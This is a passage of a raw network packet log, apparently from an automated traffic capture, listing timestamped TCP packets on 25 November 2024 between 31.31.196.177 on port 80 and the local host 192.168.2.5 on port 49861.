                                                      Nov 25, 2024 13:55:40.242616892 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.250152111 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.250226021 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.250231981 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.258974075 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.259028912 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.259066105 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.266782999 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.266885996 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.266897917 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.272350073 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.272423983 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.272430897 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.278335094 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.278412104 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.278412104 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.285228968 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.285356045 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.399915934 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.399976015 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.400115967 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.402553082 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.402664900 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.402759075 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.407358885 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.407449961 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.407545090 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.411642075 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.411724091 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.411808014 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.416611910 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.416719913 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.416810989 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.421425104 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.421519041 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.421614885 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.426276922 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.426398039 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.426506996 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.431076050 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.431197882 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.431291103 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.435920000 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.436011076 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.436104059 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.440849066 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.440936089 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.441029072 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.445600986 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.445708036 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.445806980 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.450548887 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.450687885 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.450778008 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.455889940 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.456077099 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.456187963 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.460339069 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.460450888 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.460544109 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.465054035 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.465178967 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.465229988 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.469675064 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.469891071 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.470004082 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.474538088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.474673986 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.474771023 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.479371071 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.479512930 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.479600906 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.484281063 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.484440088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.484524012 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.488996983 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.489125013 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.489216089 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.493792057 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.493947983 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.494040012 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.498579979 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.498684883 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.498779058 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.503479004 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.503590107 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.503691912 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.508178949 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.508315086 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.508403063 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.603763103 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.603852987 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.603964090 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.605343103 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.605442047 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.605495930 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.608922958 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.609098911 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.609205961 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.612752914 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.612783909 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.612896919 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.616381884 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.616485119 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.616597891 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.620114088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.620181084 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.620275974 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.623898983 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.624025106 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.624126911 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.627084970 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.627187014 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.627338886 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.630528927 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.630634069 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.630716085 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.634236097 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.634378910 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.634480000 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.637521982 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.637573004 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.637660980 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.640543938 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.640635967 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.640733004 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.643810034 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.643944979 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.644018888 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.647089958 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.647176981 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.647248983 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.650289059 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.650399923 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.650496960 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.653482914 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.653600931 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.653704882 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.656713009 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.656771898 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.656898975 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.660006046 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.660094976 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.660176992 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.663247108 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.663369894 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.663460016 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.666476965 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.666609049 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.666707993 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.669799089 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.669884920 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.669972897 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.673305988 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.673386097 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.673476934 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.676251888 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.676397085 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.676476002 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.679553032 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.679704905 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.679780006 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.682799101 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.682888985 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.682960033 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.686026096 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.686103106 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.686173916 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.689302921 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.689402103 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.689485073 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.692531109 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.692631960 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.692703009 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.695817947 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.695923090 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.696005106 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.699176073 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.699250937 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.699337006 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.702300072 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.702413082 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.702511072 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.705537081 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.705694914 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.705773115 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.708964109 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.709047079 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.709122896 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.712393045 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.713010073 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.713107109 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.716506004 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.716618061 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.716694117 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.719542980 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.719789982 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.719882965 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.722754955 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.722814083 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.722898960 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.725955963 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.726118088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.726206064 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.729648113 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.729758978 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.729831934 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.732794046 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.732858896 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.732924938 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.735294104 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.735322952 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.735399008 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.803411007 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.803564072 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.803680897 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.804583073 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.804976940 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.805022955 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.805058002 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.807473898 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.807550907 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.807717085 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.810002089 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.810074091 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.810134888 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.812527895 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.812602997 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.812618017 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.814842939 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.814913988 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.814960003 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.817293882 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.817312002 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.817346096 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.819482088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.819549084 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.819551945 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.821763039 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.821834087 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.821891069 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.823981047 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.824040890 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.824052095 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.826205015 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.826275110 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.826313972 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.828454971 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.828531027 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.828588009 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.830642939 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.830688000 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.830799103 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.832792044 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.832864046 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.832891941 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.834954977 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.834999084 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.835055113 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.839051008 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.839072943 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.839116096 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.839906931 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.839924097 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.839951992 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.841310024 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.841355085 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.841427088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.843398094 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.843458891 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.843482018 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.845493078 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.845541000 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.845582008 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.847536087 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.847573996 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.847624063 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.849559069 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.849598885 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.849642992 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.853708982 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.853728056 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.853780985 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.854492903 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.854532957 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.854655981 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.856606007 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.856647968 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.856743097 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.858388901 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.858433962 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.858541012 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.859666109 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.859724998 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.859817982 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.860793114 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.860841036 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.861036062 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.862004042 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.862051010 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.862153053 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.862936020 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.862986088 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.863221884 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.864331961 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.864372015 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.864486933 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.865432024 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.865448952 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.865474939 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.866509914 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.866556883 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.866662979 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.867784977 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.867803097 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.867825031 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.868911028 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.868998051 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.869059086 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.870202065 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.870228052 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.870279074 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.871176004 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.871264935 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.871309042 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.872437000 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.872484922 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.872590065 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.873555899 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.873605967 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.873713017 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.874655962 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.874671936 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.874700069 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.875672102 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.875720978 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.875981092 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.877070904 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.877089024 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.877123117 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.877415895 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.877433062 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.877465963 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.878279924 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.878329039 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.878365993 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.879419088 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.879466057 CET4986180192.168.2.531.31.196.177
